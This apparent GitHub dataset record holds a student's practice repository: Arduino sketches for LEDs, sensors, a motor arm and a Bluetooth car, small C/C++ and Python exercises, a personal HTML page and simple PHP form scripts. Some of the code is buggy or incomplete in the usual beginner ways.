exports) {\n napi_status status;\n napi_property_descriptor addDescriptor = DECLARE_NAPI_METHOD(\"runLayout\", RunLayout);\n status = napi_define_properties(env, exports, 1, &addDescriptor);\n assert(status == napi_ok);\n return exports;\n}\n\nNAPI_MODULE(addon, Init)\n"
}
] | 6 |
rubal501/practicas
|
https://github.com/rubal501/practicas
|
fb05b339b5aa59c449d37884e015551937ac6d4e
|
7ef0bc9dd075e6aabcc81be25bca7471d778d408
|
df380e5052fded3ad9e67a8d95bf20bd9454c1e4
|
refs/heads/master
| 2021-01-12T13:51:30.841227 | 2017-10-08T03:26:19 | 2017-10-08T03:26:19 | 69,195,686 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5028409361839294,
"alphanum_fraction": 0.5681818127632141,
"avg_line_length": 15,
"blob_id": "4210d6958fdf2a3bb097eca5628fee6e5bdc5dbe",
"content_id": "16d3a513d622cb47c56ff2f1d659a9d6a82ff77d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 352,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 22,
"path": "/Astronomia/Brazo mecanico/umbralmotor/umbralmotor.ino",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "#define umbral 30\n\nint pin1 = 6;\nint pin2 = 5;\nvoid setup() {\n // put your setup code here, to run once:\n pinMode(pin1, OUTPUT);\n pinMode(pin2, OUTPUT);\n Serial.begin(9600); \n}\n\nvoid loop() {\n int sp;\n for (sp=50; sp<256; sp++)\n {\n Serial.println(sp);\n \n analogWrite(pin1, 0);\n analogWrite(pin2, sp);\n delay(500); \n }\n}\n"
},
{
"alpha_fraction": 0.6788079738616943,
"alphanum_fraction": 0.695364236831665,
"avg_line_length": 32.55555725097656,
"blob_id": "f816799697e1f37db3914410f7a47a4c356f40f4",
"content_id": "7c8e445ab1fe3a7b278d6a218794b2e29ad1ca38",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 302,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 9,
"path": "/Arduino/pruebaArduino.py",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "import serial\nser=serial.Serial('/dev/ttyACM0', 9600)\nprint \"Dame un caracter ('r' para rojo, 'a' para amarillo, 'v' para verde y 's' para salir): \"\nentrada = raw_input()\nwhile entrada != 's':\n\tser.write(entrada)\n\tprint \"he enviado un\", entrada\n\tprint \"introduce otro caracter\"\n\tentrada = raw_input()\n"
},
{
"alpha_fraction": 0.5416953563690186,
"alphanum_fraction": 0.5596140623092651,
"avg_line_length": 24.017240524291992,
"blob_id": "dea2db23ff7d7168e54463f7063632292520344f",
"content_id": "e18854b8206642af15b0ce56a0d5901a6d675721",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 1451,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 58,
"path": "/PaginaETE/PaginaPersona/Pagina.html",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE html>\n<html>\n <head>\n <meta charset=\"utf-8\">\n <title>Pagina de Agruras</title>\n <link rel=\"stylesheet\" href=\"StylePagina.css\" media=\"screen\" title=\"no title\">\n </head>\n <body>\n <table>\n <tr>\n <td>\n <div id=\"encabezado\">\n <pre>\n Mi nombre es:\n Roberto alias \"el rubal\"\n </pre>\n </div>\n </td>\n <td>\n <img src=\"Bof.JPG\" alt=\"imagen se pone aqui\" height=\"249\" width=\"187\" />\n </td>\n </tr>\n </table>\n\n<pre>\n Resido atualmente en la cdmx\n me gustaria vivir en Canada\n Me gusta ir a Hipsterizarme a la cineteca y\n conocer restaurantes nuevos\n en los ratos libres me gusta leer.\n <a href=\"https://play.spotify.com/user/legacyrecordings/playlist/4IHvnoQpvHc1FUHEKqPOXK\" target=\"_blank\">mi musica favorita</a>\n</pre>\n<table>\n <th>\n Contacto\n </th>\n <tr>\n <td>\n <a href=\"https://github.com/rubal501/practicas\" target=\"_blank\"><img src=\"Git.png\" alt=\"\" height=\"50\" width=\"50\" /></a>\n <a href=\"https://www.youtube.com/watch?v=dQw4w9WgXcQ\" target=\"_blank\"><img src=\"Face.png\" alt=\"\" height=\"50\" width=\"50\" /></a>\n <a href=\"#\"><img src=\"Twitt.png\" alt=\"\" height=\"50\" width=\"50\" /></a>\n </td>\n\n\n </tr>\n</table>\n<ul>\n <div id=\"encabezadolinks\">\n <p>\n sitios relevantes\n </p>\n </div>\n <li><a href=\"#\">receta</a></li>\n <li><a href=\"#\">practica tablas</a></li>\n\n</ul>\n </body>\n</html>\n"
},
{
"alpha_fraction": 0.49838635325431824,
"alphanum_fraction": 0.5223605632781982,
"avg_line_length": 27.539474487304688,
"blob_id": "1dcd8570f18fea378dd8fb00492a17448d4a6080",
"content_id": "30d59231a2f047d123d76f937bca0d01c2d9c634",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2169,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 76,
"path": "/Cosas en c/mate.cpp",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "#include <iostream>\n#include <conio.h>\n#include <math.h>\n#include <stdlib.h>\nusing namespace std;\nfloat buscarDistancia(double x1, double x2, double y1, double y2){\n double cuad = 2;\n float distancia=sqrt(pow(x1-x2,cuad)+pow(y1-y2,cuad));\n return distancia;\n }\nfloat buscarPuntoMediox(float x1, float x2){\n float puntoMediox= (x2+x1)/2;\n return puntoMediox;\n }\nfloat buscarPuntoMedioy(float y1, float y2){\n float puntoMedioy= (y2+y1)/2;\n return puntoMedioy;\n }\nfloat buscarPendiente(float x1, float x2, float y1, float y2){\n float pendiente=(y2-y1)/(x2-x1);\n return pendiente;\n }\nint main()\n{\n\t/* code */\n\tchar opcion;\n\tdouble x1,x2,y1,y2;\n\tcout<<\"------------------------------------------------------------------------------\"<<endl\n\t<<\"////////////////////////////////////////////////////////////////////////////////\"<<endl;\n\tinicio:\n\tcout<<\"bienvenido usuario que opercion quiere realizar\"<<endl<<\"presione la ocion que dese:\"<<endl<<\"(a) obtener la distanciaentre dos punto\"<<endl\n <<\"(b) obtener punto medio entre dos puntos\"<<endl\n <<\"(c) obtener pendiente entre dos puntos\"<<endl\n <<\"(q) para salir\"<<endl\n <<\"////////////////////////////////////////////////////////////////////////////////\"<<endl\n <<\"------------------------------------------------------------------------------\"<<endl;\n\tcin>>opcion;\n\tcout<<\"Dame la primera x\"<<endl;\n\tcin>>x1;\n\tcout<<\"Dame la primera y\"<<endl;\n\tcin>>y1;\n\tcout<<\"Dame la segunda x\"<<endl;\n\tcin>>x2;\n\tcout<<\"Dame la segunda y\"<<endl;\n\tcin>>y2;\n\tif(opcion == 'a'){\n\t\tcout<<\"la distancia es igual a:\"<<buscarDistancia(x1,x2,y1,y2)<<endl;\n\t}\n\tif (opcion == 'b')\n\t{\n\t\tif (x1 == x2 || y1 == y2)\n\t\t{\n\t\t\tcout<<\"NO ES UN SEGMENTO\"<<endl;\n\t\t}\n\t\telse\n\t\t{ \n\t\tcout<<\"punto medio es igual a (\"<<buscarPuntoMediox(x1,x2)<<\",\"<<buscarPuntoMedioy(y1,y2)<<\")\"<<endl;\n\t\t}\n\t}\n\tif (opcion == 'c')\n\t{\n cout<<\"la pendiente entre los dos puntos: \"<<buscarPendiente(x1,x2,y1,y2) <<endl;\n\t}\n\tif (opcion == 'q')\n\t{\n\t\tsystem(\"cls\");\n\t\tcout<<\"adios\"<<endl;\n\t}\n\telse{\n\t\tsystem(\"cls\");\n\t\tcout<< \"inserte una opcion valida\"<<endl;\n\t\tgoto inicio;\n\t}\n\tgetch();\n\treturn 0;\n}\n"
},
{
"alpha_fraction": 0.6180257797241211,
"alphanum_fraction": 0.6638054251670837,
"avg_line_length": 28.723403930664062,
"blob_id": "82334fc441939d65534543448b747eaf78ad98a0",
"content_id": "cd63ec8ea8c693eca1c02b46e00651a0f2ca989e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1398,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 47,
"path": "/Arduino/ArduinoConsesor.ino",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "\nint sensor = A0;int lectura;int ledr=10;int leda=11;int ledv=12;\n\n// the setup routine runs once when you press reset:\nvoid setup() {\n // initialize the digital pin as an output\n Serial.begin(9600);pinMode(ledr, OUTPUT);pinMode(leda, OUTPUT);pinMode(ledv, OUTPUT);\n}\n\n\n// the loop routine runs over and over again forever:\nvoid loop() \n{\n lectura = analogRead(sensor);\n Serial.println(lectura);\n delay(500);\n if(lectura >= 500){\n digitalWrite(leda, HIGH);\n delay(300);\n digitalWrite(leda, LOW);\n delay(300);\n }\n else{\n digitalWrite(ledr, HIGH); // turn the LED on (HIGH is the voltage level // wait for a second\n delay (9000);\n digitalWrite(ledr, LOW); // turn the LED off by making the voltage LOW\n delay(1000);\n digitalWrite(leda, HIGH);\n delay (1000);\n digitalWrite(leda, LOW); // turn the LED off by making the voltage LOW\n delay(500);\n digitalWrite(leda, HIGH);\n delay (1000);\n digitalWrite(leda, LOW); // turn the LED off by making the voltage LOW\n delay(500);\n digitalWrite(leda, HIGH);\n delay (1000);\n digitalWrite(leda, LOW); // turn the LED off by making the voltage LOW\n delay(500);// wait for a second\n digitalWrite(ledv, HIGH);\n delay (9000);\n digitalWrite(ledv, LOW); // turn the LED off by making the voltage LOW\n delay(1000);\n digitalWrite(ledr, HIGH); // \n delay(4000);\n digitalWrite(ledr, LOW);\n }\n}\n"
},
{
"alpha_fraction": 0.6138364672660828,
"alphanum_fraction": 0.6675052642822266,
"avg_line_length": 22.15534019470215,
"blob_id": "04118a860f023a17e5c736786629766b2c93d43d",
"content_id": "d4bf3ef832d00477dc55eb9a2ec381c54b8a27e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2385,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 103,
"path": "/CarroBluethoth/CarroBluethoth.ino",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "#include <SoftwareSerial.h>\n#define motor1 3\n#define motor2 6\n#define M1dir1 4//motor1 con direccion 1\n#define M1dir2 5//motor1 con direccion 2 \n#define M2dir1 7//motor2 con direccion 1\n#define M2dir2 8//motor2 con direccion 2\n/*ojo la direccion 1 es hacia adelante, mientras que la\n direccion dos va hacia atras*/\nSoftwareSerial BT(9, 10);//el puto rx y tx va al revez pelotudo\nchar dato;\nvoid setup() {\n // put your setup code here, to run once:++++\n pinMode(motor1, OUTPUT);\n pinMode(motor2, OUTPUT);\n pinMode(M1dir1, OUTPUT);\n pinMode(M1dir2, OUTPUT);\n pinMode(M2dir1, OUTPUT);\n pinMode(M2dir2, OUTPUT);\n //se inicializa cada uno de los puertos\n BT.begin(9600);\n Serial.begin(9600);\n}\nvoid MoverHaciaAdelante(void) {\n digitalWrite(M1dir2, LOW);\n digitalWrite(M1dir1, HIGH);\n digitalWrite(M2dir2, LOW);\n digitalWrite(M2dir1, HIGH);\n delay(1000);\n}\nvoid Frenar (void) {\n digitalWrite(motor1, LOW);\n digitalWrite(motor2, LOW);\n}\nvoid MoverHaciaAtras(void) {\n digitalWrite(motor1, LOW);\n digitalWrite(motor2, LOW);\n //delay(100);\n digitalWrite(M1dir2, HIGH);\n digitalWrite(M1dir1, LOW);\n digitalWrite(M2dir2, HIGH);\n digitalWrite(M2dir1, LOW);\n digitalWrite(motor1, HIGH);\n digitalWrite(motor2, HIGH);\n delay(1000);\n\n}\nvoid MoverHaciaIzquierda(void) {\n digitalWrite(motor1, LOW);\n digitalWrite(motor2, LOW);\n //delay(100);\n digitalWrite(M1dir2, HIGH);\n digitalWrite(M1dir1, LOW);\n digitalWrite(M2dir2, HIGH);\n digitalWrite(M2dir1, HIGH);\n analogWrite(motor1, 150);\n digitalWrite(motor2, HIGH);\n delay(1000);\n\n}\nvoid MoverHaciaDerecha(void) {\n digitalWrite(motor1, LOW);\n digitalWrite(motor2, LOW);\n //delay(100);\n digitalWrite(M1dir2, HIGH);\n digitalWrite(M1dir1, LOW);\n digitalWrite(M2dir2, HIGH);\n digitalWrite(M2dir1, HIGH);\n analogWrite(motor2, 150);\n digitalWrite(motor1, HIGH);\n delay(1000);\n\n}\n\n\nvoid loop() {\n if (BT.available() > 0) //revisa si se recibe datos\n {\n dato = BT.read();\n Serial.println(dato);\n if (dato == 'a') {\n digitalWrite(motor1, HIGH);\n digitalWrite(motor2, HIGH);\n MoverHaciaAdelante();\n }\n if (dato == 'r') {\n MoverHaciaDerecha();\n }\n if (dato == 'l') {\n MoverHaciaIzquierda();\n }\n if (dato == 'b') {\n digitalWrite(motor1, HIGH);\n digitalWrite(motor2, HIGH);\n MoverHaciaAtras();\n }\n if (dato == 'f') {\n Frenar();\n }\n\n }\n\n}\n"
},
{
"alpha_fraction": 0.5857418179512024,
"alphanum_fraction": 0.6146435737609863,
"avg_line_length": 19.520000457763672,
"blob_id": "8e74095a185d8d28ed7e72ee44a5778e0a855511",
"content_id": "d91e586fee59f69dbf4ca34ffd361103080a5a32",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 519,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 25,
"path": "/pruebaPotenciometro/pruebaPotenciometro.ino",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "int A,B;\nint pin1 = 6;\nint pin2 = 7;\nvoid setup()\n{\n Serial.begin(9600);\n pinMode(pin1, OUTPUT);\n pinMode(pin2, OUTPUT);\n}\n \nvoid loop(){\n int poten = digitalRead(A0);\n Serial.print(\"dame el objetivo\");\n int objetivo = Serial.read();\n int e = objetivo - poten;\n if(e>0){\n //no tengo idea de que poner\n //se me ocurre poner un analog write que tenga el valor de A y B\n //pero como no tengo el motor no me la quiero jugar\n analogWrite(pin1, e);\n }\n if(e<0){\n analogWrite(pin2, e);\n }\n}\n\n \n"
},
{
"alpha_fraction": 0.8199999928474426,
"alphanum_fraction": 0.8199999928474426,
"avg_line_length": 32.33333206176758,
"blob_id": "b5a85bb85892e8f1f4453c38bb39f67f9fc192c0",
"content_id": "2c8f38a0b488c9536e64bd0af9865dc5c197bb52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 100,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 3,
"path": "/PaginaETE/ProyectosHtml/README.md",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "# practicas\nEste es un repositorio donde guardo mis practicas.\ntodo esto puede ser usado libremente\n"
},
{
"alpha_fraction": 0.6111111044883728,
"alphanum_fraction": 0.6296296119689941,
"avg_line_length": 21.14285659790039,
"blob_id": "304e1d98e889b1dfcc29ad8ffb12a086a0a7a538",
"content_id": "d6c8150809967abcde0df324b8b58ea4662f3454",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 162,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 7,
"path": "/PaginaETE/ProyectosHtml/receta/RemEx.py",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "import math\ndef square_or_square_root(arr):\n for inte in arr:\n \tarr[inte] = math.sqrt(inte)\n return arr\na = [4,25]\nprint square_or_square_root(a) \n \t "
},
{
"alpha_fraction": 0.5978260636329651,
"alphanum_fraction": 0.5978260636329651,
"avg_line_length": 52.400001525878906,
"blob_id": "51288910cbd23cbf20e01ad6f00bfd96daf6701b",
"content_id": "2b590b2eabee383fc367c30de1d1c57fd41d3eea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 276,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 5,
"path": "/PaginaETE/Examen/Exa.php",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "\r\n\r\nSu nombre es: <?php echo htmlspecialchars($_POST['nom']); ?> .<br>\r\nSu numero de cuenta: <?php echo $_POST['num']; ?>.<br>\r\nSu grupo: <?php echo $_POST['grupo']; ?>.<br>\r\n<?php echo \"Sus respuestas fueron capturadas\"; ?><br>\r\n<?php echo \"Que la fuerza te acompane\"; ?>\r\n"
},
{
"alpha_fraction": 0.5576323866844177,
"alphanum_fraction": 0.6074766516685486,
"avg_line_length": 14.800000190734863,
"blob_id": "5b34d90175941df8ede0d2ea43d85b2025ed6782",
"content_id": "8b76fba571d6409b89ee45dd7991446994aebd22",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 321,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 20,
"path": "/fadz.c",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "#include<SoftwareSerial.h>\nSoftwareSerial BT(10,11);\nint led = 13; \nint data;\n \nvoid setup()\n{\n BT.begin(9600);\n pinMode(led, OUTPUT); //establecemos 13 como salida\n Serial.begin(9600); //iniciando Serial\n}\n \nvoid loop(){\n if(BT.available()){\n data = BT.read();\n Serial.println(data);\n \n }\n \n }\n\n "
},
{
"alpha_fraction": 0.5843495726585388,
"alphanum_fraction": 0.6341463327407837,
"avg_line_length": 20.39130401611328,
"blob_id": "9e7d931a009bffb21dae6859114e9d00b109bdbc",
"content_id": "e6753f9f7ba67662ebfd942df3903c2040f40e96",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 984,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 46,
"path": "/Astronomia/Brazo mecanico/Fer/Fer.ino",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "#define umbral 70\n#define precision 10\nint angulo1, angulo2, diferencia, B, A;\nint pin1 = 6;\nint pin2 = 5;\nint pinEntrada = A0;\nvoid setup() {\n // put your setup code here, to run once:\n pinMode(pin1, OUTPUT);\n pinMode(pin2, OUTPUT);\n pinMode(pinEntrada, INPUT);\n pinMode(A1, INPUT);\n Serial.begin(9600);\n //map(angulo1,0,1024,0,100);\n}\n\nvoid loop() {\n // put your main code here, to run repeatedly:\n angulo1 = analogRead(pinEntrada);\n\n //falta una manera para que interactue con el usuario\n angulo2 = analogRead(A1);\n diferencia = angulo2 - angulo1;\n Serial.print(angulo1);\n Serial.print(\" \");\n Serial.println(angulo2);\n if (abs(diferencia) < precision)\n {\n analogWrite(pin1, 0);\n analogWrite(pin2, 0);\n }\n else\n {\n if (diferencia > 0)\n {\n analogWrite(pin2, 0);\n analogWrite(pin1, diferencia + umbral);\n }\n if (diferencia < 0)\n {\n analogWrite(pin1, 0);\n analogWrite(pin2, -diferencia + umbral);\n }\n }\n delay(10);\n}\n"
},
{
"alpha_fraction": 0.5950226187705994,
"alphanum_fraction": 0.610859751701355,
"avg_line_length": 15.370369911193848,
"blob_id": "d38366e2c9fd7faf391cf6964391c269beb0847f",
"content_id": "127ce48ea19f1f704660469903e84fb341a5402a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 442,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 27,
"path": "/escritor.c",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "#include <string.h>\n#include <stdio.h>\n#include <conio.h>\n#include <string>\nint main()\n{\n\t/* code */\n\tstd:string nommbre;\n char nombre[10];\n\tprintf(\"Dame el nombre del archivo que quieres crear\\n\");\n\tscanf(nombre);\n\t\n FILE *arch;\n\tchar linea[30], fin[5]=\"\";\n\tarch = fopen(,\"w\");\n\t\n\tdo\n\t{\n\t\tprintf(\"palabra:\");\n\t\tgets(linea);\n\t\tfputs(\"\\n\",arch);\n\t\tfputs(linea,arch);\n\t}while(strcmp(linea,fin)!=0);\n\tfclose(arch);\n\tgetch();\n\treturn 0;\n}\n"
},
{
"alpha_fraction": 0.6153846383094788,
"alphanum_fraction": 0.6524725556373596,
"avg_line_length": 20.264705657958984,
"blob_id": "722c24230dceeba5498cfcc866fd585105c4672f",
"content_id": "9d7d9a8809c8b23bc9223d25c9e30cf5120af4d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 728,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 34,
"path": "/Arduino/sesor.c",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "int Sensor = A0;\nint Rojo = 10;\nint Amarillo = 9;\nint Verde = 8;\nint Lectura;\nvoid setup() {\n // put your setup code here, to run once:\npinMode(Sensor, INPUT);\nSerial.begin(9600);\npinMode(Rojo, OUTPUT);\npinMode(Amarillo, OUTPUT);\npinMode(Verde, OUTPUT);\n\n}\n\nvoid loop() {\n // put your main code here, to run repeatedly:\n Lectura = analogRead(Sensor);\n Serial.print(\"analog.Read = \");\n Serial.println(Lectura);\n if(Lectura >= 400 && Lectura <500 ){\n digitalWrite(Verde, HIGH);\n }\n if(Lectura >= 500 && Lectura <600 ){\n digitalWrite(Amarillo, HIGH);\n }\n if(Lectura > 600){\n digitalWrite(Rojo, HIGH);\n }\n delay(300);\n digitalWrite(Verde, LOW);\n digitalWrite(Amarillo, LOW);\n digitalWrite(Rojo, LOW);\n}\n \n"
},
{
"alpha_fraction": 0.572877049446106,
"alphanum_fraction": 0.6210392713546753,
"avg_line_length": 20.324323654174805,
"blob_id": "002ec77c447d245913011b0ebee6b9d6ebe74dd5",
"content_id": "b222e072e18ccddcb3f131b8eedcfc145f5eb007",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 789,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 37,
"path": "/Astronomia/Brazo mecanico/sketch_jan25a/sketch_jan25a.ino",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "int angulo1, angulo2, diferencia, B, A;\nint pin1 = 6;\nint pin2 = 5;\nint pinEntrada = A0;\nvoid setup() {\n // put your setup code here, to run once:\n pinMode(pin1, OUTPUT);\n pinMode(pin2, OUTPUT);\n pinMode(pinEntrada, INPUT);\n pinMode(A1, INPUT);\n Serial.begin(9600); \n //map(angulo1,0,1024,0,100);\n}\n\nvoid loop() {\n // put your main code here, to run repeatedly:\n angulo1 = analogRead(pinEntrada);\n //falta una manera para que interactue con el usuario\n angulo2 = analogRead(A1);\n diferencia = angulo2 - angulo1;\n if (diferencia > 0)\n {\n \n analogWrite(pin2, 0);\n analogWrite(pin1, diferencia);\n }\n if (diferencia < 0)\n {\n analogWrite(pin1, 0);\n analogWrite(pin2, diferencia);\n }\n if (diferencia == 0)\n {\n //no se hace nada\n } \n\n}\n"
},
{
"alpha_fraction": 0.5006693601608276,
"alphanum_fraction": 0.5261043906211853,
"avg_line_length": 13.365385055541992,
"blob_id": "a77ad3b066c00a4724dd808fe42516f561225e5c",
"content_id": "2944648963816d4211400c88c8b5cee005bc65bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 750,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 52,
"path": "/Cosas en c/noMuyUtil.cpp",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "#include <iostream>\n#include <string>\n#include <conio.h>\n#include <windows.h>\nusing namespace std;\nint main(void)\n{\n\t/* code */\n\tchar pwd[30], usr[30];\n\tint i, cont;\n\tstrcpy(pwd, \"hola\");\n\tdo\n\t{\n printf(\"\\nintroduce la contraseña \\xA4\\aa:\\n\");\n\ti = 0;\n\tcont ++;\n\tdo\n\t{\n\t\tusr[i] = getch();\n\t\tif(usr[i]!=13 && usr[i]!=8)\n\t\t{\n\t\t\tprintf(\"*\");\n\t\t\ti++;\n\t\t}\n\t\tif (usr[i]==8 && i >=1)\n\t\t{\n\t\t\tusr[i]= ' ';\n printf( \"\\b \\b\");\n\t\t\ti--;\n\t\t}\n\t}\n\twhile(usr[i]!=13);\n\tusr[i] = '\\0';\n\tif (strcmp(usr,pwd)==0)\n\t{\n\t\tprintf(\"\\nconstraseñao\");\n\t}\n\telse\n\t{\n\t\tprintf(\"\\ncontraseña incorrecta\");\n\t}\n}while(strcmp(usr,pwd)!=0||cont==3);\nif (strcmp(usr,pwd)==0){\nprintf(\"bievenido\");\n}\nelse\n{\n printf(\"cuenta bloqueada\");\n }\ngetch();\n\treturn 0;\n}\n"
},
{
"alpha_fraction": 0.4606741666793823,
"alphanum_fraction": 0.49578651785850525,
"avg_line_length": 16.774999618530273,
"blob_id": "ae62bafba8143efcba5577b36a780ef1e68c3f3b",
"content_id": "83531b729142911f003bd81eb424d8b4d66d4555",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 712,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 40,
"path": "/yoptot.c",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "#include <conio.h>\n#include <stdio.h>\n#include <string.h>\nint main(void)\n{\n //esta Version es para solo 10 digitos\n char lista[20][10];\n int bandera;\n char aux[20];\n for (int i = 0; i < 10; ++i)\n {\n printf(\"dame una palabra: \");\n gets(lista[i]);\n }\n //esta parte se encarga de ordenar los numeros\n bandera = 1;\n while (bandera == 1) {\n bandera = 0;\n for (int g = 0; g < 8; ++g)\n {\n if (strcmp(lista[g], lista[g + 1]) > 0)\n {\n strcpy(aux, lista[g]);\n strcpy(lista[g], lista[g + 1]);\n strcpy(lista[g + 1], aux);\n bandera = 1;\n }\n }\n\n }\n\n\n for (int d = 0; d < 10; ++d)\n {\n printf(\"\\n\");\n puts(lista[d]);\n }\n getch();\n return 0;\n}\n\n"
},
{
"alpha_fraction": 0.5493826866149902,
"alphanum_fraction": 0.5761317014694214,
"avg_line_length": 29.375,
"blob_id": "c1fa9a1f89ad857010b07932884eacd8f4134cc5",
"content_id": "2b4d2d5da0fe1a1366290a7eb6440cea5b137b4e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 486,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 16,
"path": "/PaginaETE/ProyectosHtml/receta/intento.py",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "import random\n\nprint \"i am going to think in a random number.\"\no = int(raw_input(\"which range (10,100,1000) should i use?\"))\n\nu =int(raw_input(\"give me yout guess\"))\ndef diferenciador (x,y):\n z = random.randrange(0, x, 1)\n if y != z:\n if y - z >= (.5 *x):\n return \"yo losse, your number was too hight \"\n elif y - z <= (.5*x):\n return \"you losse your number was too low \"\n elif y == z:\n return \"yo won hurray\"\nprint diferenciador(o,u)\n"
},
{
"alpha_fraction": 0.6116504669189453,
"alphanum_fraction": 0.6116504669189453,
"avg_line_length": 49.5,
"blob_id": "984643cf4aa3babaf8fb0be70227fa1bd0f6c766",
"content_id": "fd7459d38fcfc31241492df7d5b02903b02ceb46",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 104,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 2,
"path": "/PaginaETE/ProyectosHtml/resp.php",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "hola <?php echo htmlspecialchars($_Post['nom']); ?>.\r\nusted tiene <?php echo $_Post['edad']; ?> años.\r\n"
},
{
"alpha_fraction": 0.5763598084449768,
"alphanum_fraction": 0.5889121294021606,
"avg_line_length": 23.538461685180664,
"blob_id": "c4c082b7d82503da5aefb84f9afe0fec1d51dde3",
"content_id": "a61c1b03076b9f9e63726f634e2b242e86007b97",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 956,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 39,
"path": "/Arduino/PruebaSerialpy.c",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "int ledRojo = 8;\nint ledVerde = 9;\nint ledAmarillo = 10;\nint mssg = 0; //variable para guardar el mensaje\n \nvoid setup()\n{\n pinMode(ledRojo, OUTPUT);\n pinMode(ledAmarillo, OUTPUT);\n pinMode(ledVerde, OUTPUT); //establecemos 13 como salida\n Serial.begin(9600); //iniciando Serial\n}\n \nvoid loop()\n{\n if (Serial.available() > 0)\n {\n mssg = Serial.read(); //leemos el serial\n \n if(mssg == 'r')\n {\n digitalWrite(ledRojo, HIGH); //si entra una 'e' encendemos\n digitalWrite(ledAmarillo, LOW);\n digitalWrite(ledVerde, LOW);\n }\n else if(mssg == 'a')\n {\n digitalWrite(ledAmarillo, HIGH); //si entra una 'a' apagamos\n digitalWrite(ledRojo, LOW);\n digitalWrite(ledVerde, LOW);\n }\n else if (mssg = 'v')\n {\n digitalWrite(ledVerde, HIGH);\n digitalWrite(ledRojo, LOW); //si entra una 'e' encendemos\n digitalWrite(ledAmarillo, LOW);\n }\n }\n}"
},
{
"alpha_fraction": 0.6530612111091614,
"alphanum_fraction": 0.6700680255889893,
"avg_line_length": 18.600000381469727,
"blob_id": "97ebc2f5b822cc6b26e251dc04bd43eddea18e18",
"content_id": "060a4d001e1fabf9b971da0c686611ecd876c212",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 294,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 15,
"path": "/Arduino/PruebaFotosensor.c",
"repo_name": "rubal501/practicas",
"src_encoding": "UTF-8",
"text": "int Sensor = 0;\nint Lectura;\nvoid setup() {\n // put your setup code here, to run once:\npinMode(Sensor, INPUT);\nSerial.begin(9600);\n\n}\n\nvoid loop() {\n // put your main code here, to run repeatedly:\n Lectura = analogRead(Sensor);\n Serial.print(\"analog.Read = \");\n Serial.println(Lectura);\n}\n"
}
] | 21 |
